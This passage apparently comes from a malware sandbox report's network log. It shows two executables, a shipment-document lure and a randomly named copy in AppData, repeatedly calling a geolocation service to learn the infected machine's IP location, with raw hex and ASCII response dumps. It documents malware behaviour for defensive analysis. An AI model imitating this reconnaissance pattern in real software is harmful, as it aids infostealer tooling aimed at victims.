                                                    2024-10-11 07:35:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449741188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:21 UTC712INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 2
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IxudtAYZK9cKz01c2kOK18RfMHj1vmfFh6%2FexpG%2FewO%2BOd0NamOy2ncxD0rJEXUgVS%2Bh0GPhLrH7KHcmHF%2B1jQ432Mq8MWrYXaXn6%2BQIy%2FuB7ZXIO2SI7CRUJHzQyRrpaFn%2Bq3n1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c483c5a42d1-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449742188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:22 UTC702INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 3
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWumMPE4dUJQtVIyXq2BcYKgmXw%2FVpaWqONPxMe9b4YJ3GX100ZKLTNaJZ45TJgUy4sV51Apm6ynBE%2FOTuAV0NNiFL28diOINLPE%2FDwPNpbxCQ73zpK4dceEDs8XerGTIjVw6wnK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c4a98a380e2-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449745188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:23 UTC700INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 3
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m7SH63OV42T2GliWy191I3SQZ378Z7S1ZWuFTAlfyo7PUqhWpl0TbNbz566xUWrmEryGgdNnHDOlggO0t4H%2B3x2jegv9XMX0rncWZGdvHT0bUDYBCS6%2FlrKeFfTmYlQ3U5mW1tZE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c507de7c332-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449746188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:23 UTC706INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqZtSLB4Iq9KfdnrI3z7%2Fe5vgDcyvP9gMVt5z5TUkTaWQ1cCm9k5x7sgkVcIwt6OasnODTt1bRBrjGoonYkbY7hN50%2F1zfc1jt%2FwP3UcqRwpFYsdX7Q3DB6oy%2FIe3u4NsNLn9PH%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c52aa0318cc-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449749188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:24 UTC714INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 5
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2qe7t6%2BKNIcl%2FwxXBnGS5XND1RVk6l1DIdl5keNmok5h2d6U58HTiG%2FwyBrpIkhiQeG3z%2B%2Bz5Kn1Mb%2F5ftTA%2BwqrRiOFTm5dSQXx24J7mhHwXTnsgtd3htjg%2BH9RTDD4QMTr%2FxV3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c58cc3b1855-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449750188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:24 UTC704INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 5
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U12Xq6ZMVpQSVkjhg5A%2F5JshIhSl%2FaQJRJD8iRWtJSqsOXq6DVzoKHYHEU992ZUT3DBxxnk2lVfkKTrdrBCJ4sz22PuEOPnU5d%2BTTdKNlL5MZXRlNxbRi%2Bm8z3ub5WgmvF5MZ0A3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c5afff117f5-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449753188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:25 UTC704INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 6
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVRzsZaw26Rx%2BpAc4uwryu1aSCcBSMEY4d%2BzDmMWo1ohwwdLmUuJ47tbENWtz%2FjWDNRlbZuzhqffkvnFVMOpn9td83wz5c2Atd2iQgTWex8Hx0C7qiMrW3yB85vVM2yUYXFBX%2Bu0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c60e8224332-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449754188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:25 UTC708INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 6
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2knROu7JeUScCbI0QTafNHWxBLA578GjshF6pS%2FhD5VsCrXd4T3TUHyN5I0%2FTX1HoM%2B%2BG6q7pSdFKJmm%2B3jSBg5IIqvKTPZ4OuEsNdxhKILLE543wHRpm3xCzMnPE2v22fB5KK%2B7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c62e8631801-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449757188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:26 UTC700INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 7
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agjrrytN4dpaAaTI6GlkrOOJLH49MHAb65%2FkKAzej0lu2g3qnDyewjWs1fNlRbIr0sjsMexmh3F9vfJcNCXd1cWO14WTcIN6qXIgVZnh89iMVsq%2B1ysWWi3CDMBPW3vycU0JOwMl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c6908a80f4a-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.449758188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:27 UTC714INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
